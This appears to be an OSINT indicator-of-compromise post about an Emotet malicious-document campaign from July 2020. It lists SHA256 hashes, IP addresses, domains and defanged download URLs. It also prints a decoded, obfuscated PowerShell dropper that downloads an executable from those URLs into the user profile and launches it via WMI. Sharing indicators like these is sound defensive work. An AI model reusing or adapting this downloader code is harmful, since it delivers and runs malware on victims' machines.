Emotet_Doc_out_2020-07-29_12_37.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4.  
5. 5710b01ee4d0e978814cc2610a9cd3a20fd8761101b3a3de4f63b51679796c0a
6. c5bbf4092543589c22f0825343fa7ce06916a0f4a79eead16b2319086e03753e
7. a98f960e08eea28006d1b9d0faa43f9a4fc83062c9c33c1dbe5ed020a8cd51ff
8. 474aa52b41ab44c8795ca65e5c5b2b4f84fff4811c77a8791c86d035b45bb3f2
9. d1a85b09f9e7e505603adf98d73ac1e4b3b2725bf969a557cc01c147f2daa4e6
10. 5c1dfeb8604d2025639c0e95ecb77106b9536467e5a6e86af0ade6b684ed0f60
11. b055c91beadcc69f982e372bba82ce74efcb003bb9c2fc772efae1a27beb3387
12. d3ee72ffbd93738908ddb2ee2fe2330cdc187dde05a8aa4d8ebcf62bf5c521cd
13. 216102bcebe04d591b4e71990d8be1e9e7877519c4f27dcf01df2cdbd4f935c1
14. 5efb249ce7b7d1f83f218c8187b1c8cee43bde68bfcf524bc21d8821e448c5eb
15. 8bcb81a90d9831d9b0ffd723b83b907cbf0011de32de2cb18c01cbd66b11d47e
16. 0ded8527f3fd10bea37326e5ea52ae190eb531638d8e0f4203d1e2fe9112af1e
17. e24a991609898738c00e796e782e19eedb6d767fb20c7e87bff3fb8f58fb1b66
18. 29142d1b50c19825901b0907408eb52d7962cff9742b7c0dcd550b7aabbab2e6
19. abbadc25a1fb109c75ed4598fcf4b1e85e7b90faf37dc756f6ad2aedc32eb874
20. 47c345c8baedb045d6e15b8a66cddee16cdeafc7b87f4538e9b147e92e5a1a25
21. 1248c5b60260f9fd6d61589cc8d8d63da798c15d292ce54800199401fcb99972
22. 1025216058d489f910a0436f2fc8da78f7b0c69707130f006d627744e413067a
23. d5c02f77a90c627c04faa9dabbeb7271d11a7df0749d07af987994c830ea0657
24. f9e21c32753d07b9af540aa838505f4aab10a1fc3e670affaae3c322976891ff
25. df3f07a28988e65741321c968afd02eaf8a49fa2dcf2e2f2685d04e13a236122
26. 3d58123ccd88ada2e760b9bf07db9231cc706ced206f123f1972e3a154458729
27. 0691c15ed061527f264577df6eeed7d15df552eb791e35a50c432dbe6312bdf7
28. 9e6b07432484371908b25279a80c78f3f717726fdc1cee80af1458b9dcdd92bf
29. efbdd4a2e805ca7a03f7b2ee982cca0593c6795e98eb322db0c78535a7d6ec8f
30. dd1fe9f11a267149ce356a768d071605c1972fd10d1f7a57a29fe8a2c8fb41c1
31. ca72f5e3246923867063647a971ebfab60e5a66e1af8d1f9187419756dc94215
32. 8ac91d2ac91bacb58cff376537c53f917eb9a260fe9d73e83e1622ae1330999a
33. 365c53ae77c38b76a767821812d50e9e2fadb0f2c6b356508307bf9933649e2b
34. 745208b9589c716bfe12fb99f5d6fe5e713fabb7097d8629a75a114584b2cec5
35. 89c0676d70b229ef63b2b04b4a00aec67e5b583e4d8ca3eb06434f7fffae1dbb
36. ec58eee07fffa7a7af0387949a025a2ed4f748060d7420dc53316cb6b9a332e3
37. 80c2733aec99f5aab73c4555949f84ae4ebf7369955d07fa9a0c4a8d06265fe3
38.  
39. IPs:
40. 116.90.60.13
41. 162.216.4.226
42. 207.58.184.66
43. 208.78.173.10
44. 213.171.197.190
45.  
46. Domains:
47.  
48. henney.net
49. jenerationz.com
50. smdcomputers.com
51. stcswim.com
52. www.ramms.com.au
53.  
54.  
55. hxxp://www.ramms.com.au/fodico/it_na0x8_nykhe/
56. hxxp://stcswim.com/tj_fk_6/
57. hxxp://smdcomputers.com/libraries/3tv_vzx_z3g/
58. hxxp://jenerationz.com/icon/os/css/4ekl8_lwj_c6d0/
59. hxxp://henney.net/misc/exl_x_f6p8tnz/
60.  
61.  
62. Decoded Base64 Powershell:
63. $woetsopzooj='noiykoen';
64. [Net.ServicePointManager]::"SEcuRIT`y`pROtocOl" = 'tls12, tls11, tls';
65. $duanyothneay = '985';
66. $thecgesmean='kiequbeox';
67. $youtgeowguax=$env:userprofile+'\'+$duanyothneay+'.exe';
68. $heixbedjithchin='tachseuhdoeququeub';
69. $yeovchiofthuum=&('ne'+'w-'+'obje'+'ct') nET.WeBclient;
70. $yiwveadboas='hxxp://www.ramms.com.au/fodico/it_na0x8_nykhe/
71. hxxp://stcswim.com/tj_fk_6/
72. hxxp://smdcomputers.com/libraries/3tv_vzx_z3g/
73. hxxp://jenerationz.com/icon/os/css/4ekl8_lwj_c6d0/
74. hxxp://henney.net/misc/exl_x_f6p8tnz/'."S`pLiT"([char]42);
75. $zeachmeuh='taolquussaitfaem';
76. foreach($heezdielsos in $yiwveadboas){try{$yeovchiofthuum."DownLO`Adf`ilE"($heezdielsos, $youtgeowguax);
77. $xarseim='heawrok';
78. If ((.('G'+'et'+'-Item') $youtgeowguax)."Len`G`TH" -ge 38683) {([wmiclass]'win32_Process')."Cre`Ate"($youtgeowguax);
79. $munweofquuag='xiangoofnievchur';
80. break;
81. $haezzaevluachquaiqu='luuvcoth'}}catch{}}$jaogyeoqu='jimpoerwaez'
82.